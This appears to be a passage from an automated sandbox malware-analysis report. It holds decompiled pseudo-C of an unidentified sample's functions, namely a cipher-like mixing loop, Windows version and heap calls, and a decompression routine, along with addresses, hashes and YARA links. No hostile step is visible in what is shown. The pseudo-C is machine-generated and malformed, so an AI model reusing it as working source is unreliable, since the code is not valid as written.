					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0x103368b; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0x103368c; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0x103368d; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0x103368e; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0x103368f; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

0x01004084
0x0100409e
0x010040a6
0x010040ae
0x010040ae
0x010040ba
0x010040bd
0x010040bd
0x010040c9
0x010040cf
0x010040d5
0x010040db
0x010040df
0x010040e8
0x010040f1
0x010040f7
0x01004100
0x0100410a
0x01004112
0x0100411a
0x01004122
0x0100412a
0x01004132
0x01004136
0x0100413a
0x0100413e
0x01004142
0x01004146
0x0100414e
0x01004152
0x01004156
0x01004156
0x0100416a
0x01004170
0x01004174
0x0100417a
0x0100417d
0x0100417f
0x01004181
0x01004185
0x01004189
0x0100418c
0x01004190
0x010041a4
0x010041aa
0x010041ae
0x010041b4
0x010041b7
0x010041bb
0x010041bf
0x010041c2
0x010041ce
0x010041e0
0x010041e6
0x010041ea
0x010041f0
0x010041f3
0x010041f5
0x010041f7
0x010041fb
0x010041ff
0x01004202
0x01004206
0x0100421a
0x01004220
0x01004224
0x0100422a
0x0100422d
0x01004231
0x01004235
0x01004238
0x01004240
0x01004254
0x0100425c
0x01004262
0x01004265
0x01004267
0x01004269
0x0100426d
0x01004271
0x01004274
0x01004284
0x0100428a
0x0100428e
0x01004294
0x01004297
0x0100429b
0x0100429f
0x010042a2
0x010042a6
0x010042aa
0x010042bc
0x010042c2
0x010042c6
0x010042cc
0x010042cf
0x010042d1
0x010042d3
0x010042d7
0x010042e2
0x010042ee
0x010042f4
0x010042f8
0x010042fe
0x01004301
0x01004305
0x01004309
0x0100430c
0x01004310
0x01004314
0x01004326
0x0100432c
0x01004330
0x01004336
0x01004339
0x0100433b
0x0100433d
0x01004341
0x0100434c
0x01004358
0x0100435e
0x01004362
0x01004366
0x0100436c
0x0100436f
0x01004371
0x01004373
0x01004377
0x0100437b
0x0100437f
0x01004382
0x01004386
0x0100438a
0x01004391
0x0100439e
0x010043a0
0x010043a4
0x010043ae
0x010043b1
0x010043b3
0x010043b5
0x010043b9
0x010043bd
0x010043c0
0x010043d0
0x010043d6
0x010043da
0x010043de
0x010043e4
0x010043e7
0x010043e9
0x010043eb
0x010043ef
0x010043f3
0x010043f7
0x010043fa
0x010043fe
0x01004402
0x01004409
0x01004416
0x0100441c
0x01004420
0x01004426
0x01004429
0x0100442b
0x0100442d
0x01004431
0x01004435
0x01004438
0x01004448
0x0100444e
0x01004452
0x01004456
0x0100445c
0x0100445f
0x01004461
0x01004463
0x01004467
0x0100446a
0x0100446e
0x01004472
0x01004476
0x0100447a
0x0100448c
0x01004492
0x01004496
0x0100449c
0x0100449f
0x010044a1
0x010044a3
0x010044a7
0x010044b2
0x010044be
0x010044c0
0x010044c4
0x010044c8
0x010044ca
0x010044d1
0x010044d3
0x010044d5
0x010044d9
0x010044e1
0x010044e4
0x010044e7
0x010044eb
0x010044ef
0x010044f3
0x010044f7
0x010044fb
0x01004506
0x0100450d
0x01004514
0x0100451b
0x0100451f
0x01004523
0x0100452a
0x0100452a
0x01004537
0x0100453b
0x0100453e
0x01004541
0x01004550

Strings

gj, xrefs: 010040C1

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: b2e7c784da2f862fa6b600ff2129e68ac77dcceb557b9598375231b3e29edb77
Instruction ID: 62c84271ced0542b2b071cb8731a9dc666c371a41e9c6bfc4828086c5ecd29c8
Opcode Fuzzy Hash: b2e7c784da2f862fa6b600ff2129e68ac77dcceb557b9598375231b3e29edb77
Instruction Fuzzy Hash: 09F1C3B1A083418FD748CF29D880A5AFBE1BFCC208F15892EF5D8D7711E634E9558B56

Uniqueness

Uniqueness Score: -1.00%

Function 0100ACF5, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100ACF5() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x103e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0x1040f60; // 0xa
					_t13 =  *0x1040f64; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x103e020 = _t12;
					 *0x1040f60 = _t6;
					 *0x1040f64 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x0100acf8
0x0100ad07
0x0100ad45
0x0100ad4a
0x0100ad09
0x0100ad0f
0x0100ad1a
0x0100ad20
0x0100ad26
0x0100ad2c
0x0100ad32
0x0100ad38
0x0100ad3d
0x0100ad3d
0x0100ad53
0x00000000
0x0100ad55
0x00000000
0x0100ad58

APIs

GetVersionExW.KERNEL32(?), ref: 0100AD1A

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 8d100773949978fe913860b8f1be3b9c25bc48430efc0ca20c54613948907abd
Instruction ID: 69c2ab861a86cd58dad200a104f2de2ad4765404c48c7d1c575f968b0968c88e
Opcode Fuzzy Hash: 8d100773949978fe913860b8f1be3b9c25bc48430efc0ca20c54613948907abd
Instruction Fuzzy Hash: 92F01DB4E0030CCBD739DB18EA856E9B3B5F748711F1006A6EA955378CD37AA9818F51

Uniqueness

Uniqueness Score: -1.00%

Function 0102B710, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0102B710() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x10616ec = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0102b710
0x0102b718
0x0102b720

APIs

GetProcessHeap.KERNEL32 ref: 0102B710

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d98db0a106b929ddf0e38e0b9323d7cbf6c0d8f6fc95882baeaba45819e3cf6f
Instruction ID: 3b183947a06675adde367ff54ebaf744579eae5816ba62ee28ae3f255821ebfc
Opcode Fuzzy Hash: d98db0a106b929ddf0e38e0b9323d7cbf6c0d8f6fc95882baeaba45819e3cf6f
Instruction Fuzzy Hash: 9DA0047C505101CFD750CF75555D30D3DFD75455D1705C155F545C5154D73D44505F41

Uniqueness

Uniqueness Score: -1.00%

Function 01015C77, Relevance: .8, Instructions: 800
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E01015C77(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E01014BB3(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E010137C1(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E01013D6D(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E010147FB(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E0100A800(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x18) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E0100A800(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E0100A800(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x18);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x18) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E0101F4B0(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E01012504();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x18) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E0101F4B0(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x14));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E01011E22(_t638, _t658 + 0x20);
																	__eflags = _t417;
